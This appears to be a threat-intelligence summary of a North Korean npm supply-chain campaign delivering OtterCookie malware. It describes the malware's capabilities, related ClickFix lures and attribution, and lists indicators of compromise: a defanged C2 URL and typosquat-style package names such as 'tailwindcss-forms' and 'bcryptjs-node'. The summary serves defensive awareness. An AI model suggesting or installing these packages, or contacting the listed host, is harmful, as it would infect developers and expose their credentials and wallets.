Key Findings

• North Korean threat actors behind the Contagious Interview campaign have flooded the npm registry with 197 more malicious packages since last month

• These packages have been downloaded over 31,000 times and are designed to deliver a variant of OtterCookie malware

• The malware attempts to evade sandboxes and virtual machines, profiles the machine, and establishes a command-and-control (C2) channel to provide the attackers with remote shell access and capabilities to steal sensitive data

Background

• The blurring distinction between OtterCookie and BeaverTail malware was documented by Cisco Talos last month in connection with an infection that impacted an organization in Sri Lanka

• The packages are designed to connect to a hard-coded Vercel URL ("tetrismic.vercel[.]app"), which then proceeds to fetch the cross-platform OtterCookie payload from a threat actor-controlled GitHub repository

Malicious Packages

• Some of the identified "loader" packages include bcryptjs-node, cross-sessions, json-oauth, node-tailwind, react-adparser, session-keeper, tailwind-magic, tailwindcss-forms, and webpack-loadcss

• The malware, once launched, attempts to evade sandboxes and virtual machines, profiles the machine, and then establishes a command-and-control (C2) channel to provide the attackers with a remote shell, along with capabilities to steal clipboard contents, log keystrokes, capture screenshots, and gather browser credentials, documents, cryptocurrency wallet data, and seed phrases

Ongoing Campaigns

• The Contagious Interview campaign is one of the most prolific campaigns exploiting npm, showing how North Korean threat actors have adapted their tooling to modern JavaScript and crypto-centric development workflows

• Fake assessment-themed websites created by the threat actors have also leveraged ClickFix-style instructions to deliver malware referred to as GolangGhost (aka FlexibleFerret or WeaselStore) under the pretext of fixing camera or microphone issues

Threat Actor Attribution

• The activity is tracked under the moniker ClickFake Interview and is distinct from other DPRK IT Worker schemes that focus on embedding actors within legitimate businesses under false identities

• Contagious Interview is designed to compromise individuals through staged recruiting pipelines, malicious coding exercises, and fraudulent hiring platforms, weaponizing the job application process itself

Sources

• https://thehackernews.com/2025/11/north-korean-hackers-deploy-197-npm.html

• https://x.com/Dinosn/status/1994449828810530894

• https://x.com/TheHackersNews/status/1994440919207362913

• https://bvtech.org/north-korean-hackers-deploy-197-npm-packages-to-spread-updated-ottercookie-malware/